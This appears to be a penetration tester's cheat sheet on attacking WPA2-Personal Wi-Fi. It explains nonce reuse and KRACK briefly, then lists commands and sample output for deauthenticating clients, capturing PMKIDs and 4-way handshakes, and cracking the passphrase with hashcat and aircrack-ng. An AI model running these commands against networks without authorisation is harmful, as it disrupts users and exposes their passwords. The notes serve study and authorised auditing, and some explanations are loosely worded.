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WPA2 Personal

  • Also known as WPA2-PSK (Pre shared key)
  • Uses AES with Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP)


  • Must bruteforce the 4way handshake due to nonces
  • Uses SSID as a salt

Deauthentication Attack

aireplay-ng mon0 -deauth 5 -a [BSSID] -c [target MAC]

Nonce Reuse

By retransmitting Message 3 of the 4 way handshake the IV is reset to a known (null) or reused IV.

IV reuse can be used by taking a IV from one channel and respond on a different channel.

IV reuse can be done with Reinstallation attack where Message 4 of the 4 way handshake is encrypted. Since this is prohibited by the spec the next data frame that is sent will reuse the IV.

Key Re-installation Attacks - Breaking WPA2 by forcing nonce reuse
Key Re-installation Attacks - PoC
- Can replay packets because the counter is reset to 0
- Wpa supplicant refers to zeroed data for key reinstalation attacks. This makes the key all zeros


PMKID with wifite

>>> sudo wifite
   .               .
   ·  .     .  ·  `.  wifite2 2.7.0
 :  :  :  (¯)  :  :  :  a wireless auditor by derv82
 `.  ·  ` \ ´  ·    maintained by kimocoder
   `     /¯¯¯\     ´

 [+] Using wlan0mon already in monitor mode
 [+] Select target(s) (1-63) separated by commas, dashes or all: all

 [+] (1/63) Starting attacks against {REMOVED_SSID} (ESSID unknown)
 [+] unknown (99db) PMKID CAPTURE: Waiting for PMKID (4m6s)


PMKID is an ID that is sent out every couple of minuets which is a SHA1-HMAC of PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA). The only Unknown is the PMK which can be calculated with a PBKDF PMK = PBKDF2(Passphrase, SSID, 4096)


install the XXXXX, packages

Capture and Break hash:

#Get PCAP Info
hcxdumptool -w test.pcap

#Extract Hashes from pcap
hcxpcapngtool -o hcx_hashes test.pcap

#Crack with hashcat
#hashcat -m 22000 -a 3 hcx_hashes ?d?d?d?d?d?d?d?d

#Convert hashcat to john
hcxhashtool -i hcx_hashes --john hcx_john

Capturing the 4way handshake (Old way)

Capture Handshake:

#Start Monitor mode
>>> sudo airmon-ng start wlan0
PHY     Interface       Driver          Chipset

phy0    wlan0           iwlwifi         Intel Corporation Wireless 7265 (rev 59)
				(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
				(mac80211 station mode vif disabled for [phy0]wlan0)

#Capture on monitor interface
sudo airodump-ng wlan0mon

#Capture specific Accesspoint to File
sudo airodump-ng --bssid <Hardware Address of Access Point> -c <Channel> --write <Output File> wlan0mon

#Capture all AP to file

Crack with Hashcat:

#Convert capture file
cap2hccapx capture-01.cap capturefile-01.hccapx
#Cracking time
hashcat64 -m 2500 -a 3 -1 ?d -o cracked capturefile-01.hccapx 555?1?1?1?1?1?1?1


To crack WPA/WPA2 from airolib-ng database

aircrack-ng -e <essid> -r <database> <.cap or .ivs file(s)>

To crack WPA/WPA2 from a wordlist

aircrack-ng -e <essid> -w <wordlist> <.cap or .ivs file(s)>`

To crack a given bssid

aircrack-ng -b <bssid> -l <output file> <.cap or .ivs file(s)>`

To crack a given bssid using FMS/Korek method

aircrack-ng -K -b <bssid> <.cap or .ivs file(s)>`